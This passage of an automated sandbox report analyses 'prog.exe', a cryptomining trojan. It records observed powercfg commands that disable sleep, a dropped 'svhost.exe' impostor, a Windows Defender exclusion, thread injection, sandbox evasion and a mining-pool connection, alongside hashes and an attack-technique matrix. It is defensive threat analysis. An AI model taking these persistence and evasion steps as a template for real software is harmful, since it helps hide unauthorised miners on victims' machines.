          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation
          11
          Windows Service
          11
          Windows Service
          1
          Masquerading
          OS Credential Dumping321
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          12
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Service Execution
          1
          DLL Side-Loading
          111
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          131
          Virtualization/Sandbox Evasion
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          File Deletion
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542825 Sample: prog.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 58 pool.hashvault.pro 2->58 68 Malicious sample detected (through community Yara rule) 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 Yara detected Xmrig cryptocurrency miner 2->72 74 6 other signatures 2->74 8 svhost.exe 1 2->8         started        12 prog.exe 1 2 2->12         started        14 svchost.exe 2->14         started        signatures3 process4 file5 52 C:\Windows\Temp\pnhtlztmuvjx.sys, PE32+ 8->52 dropped 76 Multi AV Scanner detection for dropped file 8->76 78 Protects its processes via BreakOnTermination flag 8->78 80 Modifies the context of a thread in another process (thread injection) 8->80 82 Sample is not signed and drops a device driver 8->82 16 svchost.exe 8->16         started        20 powershell.exe 23 8->20         started        22 cmd.exe 8->22         started        30 10 other processes 8->30 54 C:\ProgramData\win32\svhost.exe, PE32+ 12->54 dropped 84 Uses powercfg.exe to modify the power settings 12->84 86 Adds a directory exclusion to Windows Defender 12->86 88 Modifies power options to not sleep / hibernate 12->88 24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        28 powercfg.exe 1 12->28         started        32 12 other processes 12->32 signatures6 process7 dnsIp8 56 pool.hashvault.pro 95.179.241.203, 443, 49781 AS-CHOOPAUS Netherlands 16->56 60 Query firmware table information (likely to detect VMs) 16->60 62 Found strings related to Crypto-Mining 16->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->64 34 conhost.exe 20->34         started        46 2 other processes 22->46 66 Loading BitLocker PowerShell Module 24->66 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        40 wusa.exe 26->40         started        42 conhost.exe 28->42         started        48 9 other processes 30->48 44 conhost.exe 32->44         started        50 11 other processes 32->50 signatures9 process10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          prog.exe74%ReversingLabsWin64.Trojan.MintZard
          SourceDetectionScannerLabelLink
          C:\ProgramData\win32\svhost.exe74%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\pnhtlztmuvjx.sys5%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          pool.hashvault.pro
          95.179.241.203
          truefalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://172.94.1qsvchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
              unknown
              https://xmrig.com/docs/algorithmssvchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                95.179.241.203
                pool.hashvault.proNetherlands
                20473AS-CHOOPAUSfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1542825
                Start date and time:2024-10-26 16:34:52 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 20s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:63
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:prog.exe
                Detection:MAL
                Classification:mal100.spyw.evad.mine.winEXE@89/12@1/1
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target svchost.exe, PID 4696 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: prog.exe
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                95.179.241.2037K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                  eshkere.batGet hashmaliciousXmrigBrowse
                    frik.exeGet hashmaliciousXmrigBrowse
                      C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                        PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                          file.exeGet hashmaliciousXmrigBrowse
                            66dd2c2d3b88f_opera.exeGet hashmaliciousXmrigBrowse
                              gutpOKDunr.exeGet hashmaliciousXmrigBrowse
                                SecuriteInfo.com.FileRepMalware.3253.21057.exeGet hashmaliciousXmrigBrowse
                                  sc7Qi5VdE1.exeGet hashmaliciousXmrigBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    pool.hashvault.probypass.exeGet hashmaliciousXmrigBrowse
                                    • 95.179.241.203
                                    loader.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    eshkere.batGet hashmaliciousXmrigBrowse
                                    • 95.179.241.203
                                    frik.exeGet hashmaliciousXmrigBrowse
                                    • 95.179.241.203
                                    Google Chrome.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                    • 45.76.89.70
                                    GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                    • 45.76.89.70
                                    C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                    • 95.179.241.203
                                    file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                    • 45.76.89.70
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AS-CHOOPAUSla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 149.253.134.252
                                    iQPxJrxxaj.exeGet hashmaliciousPikaBotBrowse
                                    • 95.179.191.137
                                    iQPxJrxxaj.exeGet hashmaliciousPikaBotBrowse
                                    • 95.179.191.137
                                    jade.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 66.42.126.40
                                    bypass.exeGet hashmaliciousXmrigBrowse
                                    • 45.76.89.70
                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 45.77.171.70
                                    http://www.xn--invitacionesdecumpleaos-dic.org/Get hashmaliciousUnknownBrowse
                                    • 45.63.66.114
                                    la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 78.141.232.197
                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                    • 140.82.60.141
                                    byte.arm.elfGet hashmaliciousOkiruBrowse
                                    • 44.175.219.158
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Windows\Temp\pnhtlztmuvjx.sysT52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                      lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                        Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                          bypass.exeGet hashmaliciousXmrigBrowse
                                            MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zipGet hashmaliciousXmrigBrowse
                                              Q3Vq6yp33F.exeGet hashmaliciousXmrigBrowse
                                                2JkHiPgkLE.exeGet hashmaliciousXmrigBrowse
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                    loader.exeGet hashmaliciousXmrigBrowse
                                                      SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                                        C:\ProgramData\win32\svhost.exeprog.exeGet hashmaliciousUnknownBrowse
                                                          Process:C:\Users\user\Desktop\prog.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2663424
                                                          Entropy (8bit):6.53722623620131
                                                          Encrypted:false
                                                          SSDEEP:49152:BMnw0O8lulPUtBbXmsGHePO2/cqKQBxLEHq86RM+uFVwYm6fYfOuFa1Y+PJq++W5:CnfxYW/b8em2/ctQBxGql2+Szm6fYfOo
                                                          MD5:D3ADC3EC7B76556B7FAC591C33F31EA9
                                                          SHA1:B7295FAE70F550AA2963DA196B08636094E26E93
                                                          SHA-256:25231BA6616C0C1BBC4DDA82BDD46AD067577E16971BAE412B1192B250B456DC
                                                          SHA-512:0EDD9263191B82E525DA655F76597BBD755174E8436E1E3A783A6A7F7064077E651A7D4DD36B3FD1B353BC435FF9D3ADE466D43327BA086DEE89B712CAB73985
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                          Joe Sandbox View:
                                                          • Filename: prog.exe, Detection: malicious, Browse
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........(.....@..........@............................. )...........`.................................................0...<.....).P.....(...............).x...............................(.......8...............p............................text...v........................... ..`.rdata...+.......,..................@..@.data...`.'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc...P.....).......(.............@..@.reloc..x.....).......(.............@..B........................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                          MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                          SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                          SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                          SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                          Malicious:false
                                                          Preview:@...e................................................@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.773832331134527
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulc:NllUc
                                                          MD5:9032B9849FD3773E547EFB4C2FBC1769
                                                          SHA1:83BF286CF64D20654D825B5D4C105544F2C62AEA
                                                          SHA-256:3EE14FD9E9AC1703D1005185DF2608CF27F3B1A8C6E1616794440892B6A96DB7
                                                          SHA-512:FF480198D3B8843158C5EB56671F695F3E38EF8AF5A6D08CF4787380407CBDB5ABEDF372F53763C950FE6D20721CB049D8D3D247E801DF4438242CC3982ED2D8
                                                          Malicious:false
                                                          Preview:@...e.................................%.K.......................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
